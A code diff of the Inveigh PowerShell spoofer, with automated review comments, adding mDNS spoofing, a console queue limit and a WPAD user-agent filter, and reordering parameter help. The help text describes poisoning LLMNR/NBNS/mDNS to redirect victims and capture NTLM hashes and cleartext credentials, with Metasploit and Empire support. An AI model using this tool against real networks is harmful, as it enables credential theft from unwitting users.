- $inveigh.relay_running = $false
+ Start-Sleep -S 1
+ $inveigh.relay_running = $false
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- $inveigh.HTTP = $false
$inveigh.HTTPS = $false
}
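Review bot: the `if($inveigh.running)` guard around the `Inveigh exited` block has been removed while a new `if($inveigh.relay_running)` guard now wraps the `Inveigh Relay exited` block, which looks inverted for this script's own stop routine: `StopInveigh` in `$control_relay_scriptblock` will now always queue `Inveigh exited at ...` and set `$inveigh.running = $false`, even when only Inveigh-Relay is running, and will only report the relay's exit if `relay_running` is still set. The deleted `$inveigh.HTTP = $false` (while `$inveigh.HTTPS = $false` stays) also looks accidental unless the HTTP flag is now cleared elsewhere.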
@@ -3316,12 +3677,22 @@ $control_relay_scriptblock =
}
+ if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
+ {
+
+ while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
+ {
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
Start-Sleep -m 5
}
}
-# HTTP Listener Startup function
+# HTTP Listener Startup Function
function HTTPListener()
{
$HTTPS_listener = $false
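Review bot: the inner `-and !$inveigh.console_output` repeats the test already made by the enclosing `if` and is redundant unless `console_output` can change while the loop runs; the loop also discards entries silently, so consider queuing a single "entries dropped" marker when trimming happens. Since `-ge 0` is the enabling check both here and in the `ControlRelayLoop` start condition, the help text should state that a negative value means unlimited and that `0` discards every entry.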
@@ -3340,13 +3711,14 @@ function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
$HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
$proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
Start-Sleep -m 50
-# HTTPS Listener Startup function
+# HTTPS Listener Startup Function
function HTTPSListener()
{
$HTTPS_listener = $true
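Review bot: `$WPADAuthIgnore` is passed positionally through `AddArgument` along with the other thirteen arguments, at three separate call sites (HTTP, HTTPS and Proxy listeners); make sure the `param()` list of `$HTTP_scriptblock` gained the new parameter at the same position, because a mismatch is silent and shifts every later argument by one. Using `AddParameter('WPADAuthIgnore', $WPADAuthIgnore)` with named parameters would remove that risk.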
@@ -3365,13 +3737,14 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
$HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
$proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
Start-Sleep -m 50
-# Proxy Listener Startup function
+# Proxy Listener Startup Function
function ProxyListener()
{
$HTTPS_listener = $false
@@ -3390,11 +3763,12 @@ function ProxyListener()
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
$ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
$proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
-# Control Relay Startup function
+# Control Relay Startup Function
function ControlRelayLoop()
{
$control_relay_runspace = [RunspaceFactory]::CreateRunspace()
@@ -3403,8 +3777,8 @@ function ControlRelayLoop()
$control_relay_powershell = [PowerShell]::Create()
$control_relay_powershell.Runspace = $control_relay_runspace
$control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RelayAutoExit).AddArgument(
- $RunTime) > $null
+ $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $RelayAutoExit).AddArgument($RunTime) > $null
$control_relay_powershell.BeginInvoke() > $null
}
@@ -3427,11 +3801,12 @@ if($Proxy -eq 'Y')
}
# Control Relay Loop Start
-if($RelayAutoExit -or $RunTime -or $inveigh.file_output)
+if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $RunTime)
{
ControlRelayLoop
}
+# Console Output Loop
if($inveigh.console_output)
{
@@ -3635,44 +4010,57 @@ if($inveigh)
catch
{
Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+ }
+
}
}
if($inveigh.relay_running)
{
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ }
+
+ Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ $inveigh.relay_running = $false
+
}
if($inveigh.running)
{
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ }
+
+ Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ $inveigh.running = $false
+
}
- $inveigh.HTTP = $false
$inveigh.HTTPS = $false
Start-Sleep -S 5
}
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 51b7d84..037f15d 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -7,7 +7,7 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/respons
.DESCRIPTION
Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features:
- IPv4 LLMNR/NBNS spoofer with granular control
+ IPv4 LLMNR/mDNS/NBNS spoofer with granular control
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB
Basic auth cleartext credential capture over HTTP/HTTPS/Proxy
WPAD server capable of hosting a basic or custom wpad.dat file
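Review bot: the feature line now reads `IPv4 LLMNR/mDNS/NBNS spoofer` but the `.DESCRIPTION` sentence two lines above it (`Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features:`) and the `.SYNOPSIS` text visible in the hunk header still omit mDNS; update them to match.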
@@ -16,75 +16,39 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea
Run time and run count control
LLMNR/NBNS spoofer learning mode
-.PARAMETER ElevatedPrivilege
-Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with
-elevated privilege. If so, options that require elevated privilege can be used.
-
-.PARAMETER IP
-Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if the
-SpooferIP parameter is not set.
-
-.PARAMETER SpooferIP
-IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other
-than the Inveigh host.
-
-.PARAMETER SpooferHostsReply
-Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
-
-.PARAMETER SpooferHostsIgnore
-Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
-
-.PARAMETER SpooferIPsReply
-Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
-
-.PARAMETER SpooferIPsIgnore
-Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
-
-.PARAMETER SpooferLearning
-Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out
-LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the
-hostname to a spoofing blacklist.
-
-.PARAMETER SpooferLearningDelay
-(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
-SpooferLearning.
-
-.PARAMETER SpooferLearningInterval
-Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a
-hostname that has already been checked if SpooferLearning is enabled.
-
-.PARAMETER SpooferRepeat
-Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
-challenge/response has been captured.
-
-.PARAMETER LLMNR
-Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request.
-.PARAMETER LLMNRTTL
-Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+.PARAMETER ConsoleOutput
+Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-.PARAMETER NBNS
-Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
+.PARAMETER ConsoleQueueLimit
+Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
-.PARAMETER NBNSTTL
-Default = 165 Seconds: NBNS TTL in seconds for the response packet.
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
-.PARAMETER NBNSTypes
-Default = 00,20: Comma separated list of NBNS types to spoof.
-Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
-.PARAMETER NBNSBruteForce
-Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+.PARAMETER ElevatedPrivilege
+Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with
+elevated privilege. If so, options that require elevated privilege can be used.
-.PARAMETER NBNSBruteForceHost
-Default = WPAD: Hostname for the NBNS Brute Force spoofer.
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
-.PARAMETER NBNSBruteForcePause
-Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming
-HTTP request is received.
+.PARAMETER FileOutputDirectory
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must
+also be enabled.
-.PARAMETER NBNSBruteForceTarget
-IP address to target for NBNS brute force spoofing.
+.PARAMETER FileUnique
+Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time file output is enabled.
.PARAMETER HTTP
Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
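Review bot: `ConsoleQueueLimit` says `Default = Unlimited` but does not say how the limit is disabled or what `0` does; since the control loop only trims when the value is `-ge 0`, document that omitting the parameter or passing a negative value keeps the queue unbounded and that `0` discards every queued entry.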
@@ -96,7 +60,7 @@ Default = Any: IP address for the HTTP/HTTPS listener.
Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to
+Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to
wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
.PARAMETER HTTPBasicRealm
@@ -122,8 +86,8 @@ This parameter will not be used if HTTPDir is set. Use PowerShell character esca
.PARAMETER HTTPS
Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store and attached to port specified IP and port. If the script does not exit gracefully, execute
-"netsh http delete sslcert ipport=" with the correct IP and port and manually remove the certificate.
+the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
+local administrator access.
.PARAMETER HTTPSPort
Default = 443: TCP port for the HTTPS listener.
@@ -137,36 +101,70 @@ Default = localhost: The subject field for the cert that will be installed for H
.PARAMETER HTTPSForceCertDelete
Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
-.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
+.PARAMETER Inspect
+(Switch) Inspect LLMNR an NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do not
+want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be enabled
+with -LLMNR and/or -NBNS.
-.PARAMETER WPADIP
-Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
-with WPADPort.
+.PARAMETER IP
+Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if the
+SpooferIP parameter is not set.
-.PARAMETER WPADPort
-Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
-used with WPADIP.
+.PARAMETER LogOutput
+Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
-.PARAMETER WPADDirectFile
-Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
-Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
-using WPADIP, WPADPort, or WPADResponse.
+.PARAMETER LLMNR
+Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
-.PARAMETER WPADDirectHosts
-Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
-defined proxy.
+.PARAMETER LLMNRTTL
+Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
-.PARAMETER WPADResponse
-wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
-are set. Use PowerShell character escapes where necessary.
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER mDNS
+Default = Disabled: (Y/N) Enable/Disable mDNS QU spoofing.
+
+.PARAMETER mDNSTTL
+Default = 120 Seconds: mDNS TTL in seconds for the response packet.
+
+.PARAMETER mDNSTypes
+Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251.
+Types include QU = Query Unicast, QM = Query Multicast
+
+.PARAMETER NBNS
+Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
+
+.PARAMETER NBNSBruteForce
+Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+
+.PARAMETER NBNSBruteForceHost
+Default = WPAD: Hostname for the NBNS Brute Force spoofer.
+
+.PARAMETER NBNSBruteForcePause
+Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming
+HTTP request is received.
+
+.PARAMETER NBNSBruteForceTarget
+IP address to target for NBNS brute force spoofing.
+
+.PARAMETER NBNSTTL
+Default = 165 Seconds: NBNS TTL in seconds for the response packet.
+
+.PARAMETER NBNSTypes
+Default = 00,20: Comma separated list of NBNS types to spoof.
+Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh through a shell that does not return other output streams.Note that you will not see the various
+yellow warning messages if enabled.
.PARAMETER Proxy
Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
.PARAMETER ProxyAuth
-Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type.
+Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy server authentication type.
.PARAMETER ProxyIP
Default = Any: IP address for the proxy listener.
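Review bot: typo in the new `Inspect` text, `Inspect LLMNR an NBNS traffic only` should read `and`, and with the mDNS listener added in this commit the description should say whether mDNS traffic is inspected as well; `-smb` is also not how a `(Y/N)` parameter is disabled, so spell out `-SMB N`. In `OutputStreamOnly`, `streams.Note` is missing a space.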
@@ -180,50 +178,54 @@ will not be sent the wpad.dat file used for capturing proxy authentications. Fir
with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
-closing and reopening.
+closing and reopening.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
.PARAMETER SMB
Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to
prevent login requests from being processed by the Inveigh host.
-.PARAMETER Challenge
-Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
-challenge will be generated for each request.
+.PARAMETER SpooferHostsIgnore
+Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
-.PARAMETER MachineAccounts
-Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+.PARAMETER SpooferHostsReply
+Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
-.PARAMETER ConsoleOutput
-Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
-ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+.PARAMETER SpooferIP
+IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other
+than the Inveigh host.
-.PARAMETER ConsoleStatus
-(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
-displaying full capture lists when running through a shell that does not have access to the support functions.
+.PARAMETER SpooferIPsIgnore
+Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
-.PARAMETER ConsoleUnique
-Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
-and username combinations when real time console output is enabled.
+.PARAMETER SpooferIPsReply
+Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
-.PARAMETER FileOutput
-Default = Disabled: (Y/N) Enable/Disable real time file output.
+.PARAMETER SpooferLearning
+Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out
+LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the
+hostname to a spoofing blacklist.
-.PARAMETER FileUnique
-Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,
-and username combinations when real time file output is enabled.
+.PARAMETER SpooferLearningDelay
+(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
+SpooferLearning.
-.PARAMETER StatusOutput
-Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+.PARAMETER SpooferLearningInterval
+Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a
+hostname that has already been checked if SpooferLearning is enabled.
-.PARAMETER OutputStreamOnly
-Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
-running Inveigh through a shell that does not return other output streams.Note that you will not see the various
-yellow warning messages if enabled.
+.PARAMETER SpooferRepeat
+Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
+challenge/response has been captured.
-.PARAMETER OutputDir
-Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must
-also be enabled.
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
.PARAMETER RunCount
Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
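Review bot: the help text for SpooferHostsReply, SpooferIP, SpooferIPsIgnore, SpooferIPsReply and SpooferRepeat still reads "LLMNR and NBNS" / "LLMNR/NBNS", yet this commit adds an mDNS spoofer and the startup message later in this file becomes "LLMNR/mDNS/NBNS Spoofer IP Address = ..."; each of these entries should state whether the filter also governs mDNS responses. Also a typo in SpooferLearningInterval: "Time in minutes that Inveigh wait before sending" should read "Inveigh will wait before sending".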
@@ -231,20 +233,41 @@ Default = Unlimited: (Integer) Number of captures to perform before auto-exiting
.PARAMETER RunTime
(Integer) Run time duration in minutes.
-.PARAMETER StartupChecks
-Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-
-.PARAMETER Inspect
-(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
-
.PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
+
+.PARAMETER WPADAuthIgnore
+Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
+popups for authenticated wpad.dat requests such as Firefox.
+
+.PARAMETER WPADDirectFile
+Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
+Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
+using WPADIP, WPADPort, or WPADResponse.
+
+.PARAMETER WPADDirectHosts
+Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
+defined proxy.
+
+.PARAMETER WPADIP
+Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
+with WPADPort.
+
+.PARAMETER WPADPort
+Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
+used with WPADIP.
+
+.PARAMETER WPADResponse
+wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
+are set. Use PowerShell character escapes where necessary.
+
.EXAMPLE
Import-Module .\Inveigh.psd1;Invoke-Inveigh
Import full module and execute with all default settings.
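Review bot: the WPADAuthIgnore entry names Firefox twice ("browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox"); drop the trailing "such as Firefox". Its "Default = Disabled" also does not match the declaration further down, [Array]$WPADAuthIgnore = "", which is an empty list rather than a switch; "Default = None" (no user agents are skipped) would describe the behaviour more accurately.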
@@ -294,57 +317,25 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
+ [parameter(Mandatory=$false)][Int]$mDNSTTL = "120",
[parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
[parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
- [parameter(Mandatory=$false)][Int]$WPADPort = "",
[parameter(Mandatory=$false)][Int]$RunCount = "",
[parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$WPADPort = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
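Review bot: the [Int] parameters added here take string literals as defaults ([Int]$ConsoleQueueLimit = "-1", [Int]$mDNSTTL = "120"); PowerShell coerces them, but numeric literals (= -1, = 120) state the intended type directly and avoid a conversion on every invocation. Since -1 is evidently a sentinel for "no limit" on ConsoleQueueLimit, make sure the .PARAMETER ConsoleQueueLimit help entry says so explicitly.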
@@ -356,7 +347,45 @@ param
[parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
[parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD",
[parameter(Mandatory=$false)][String]$WPADResponse = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
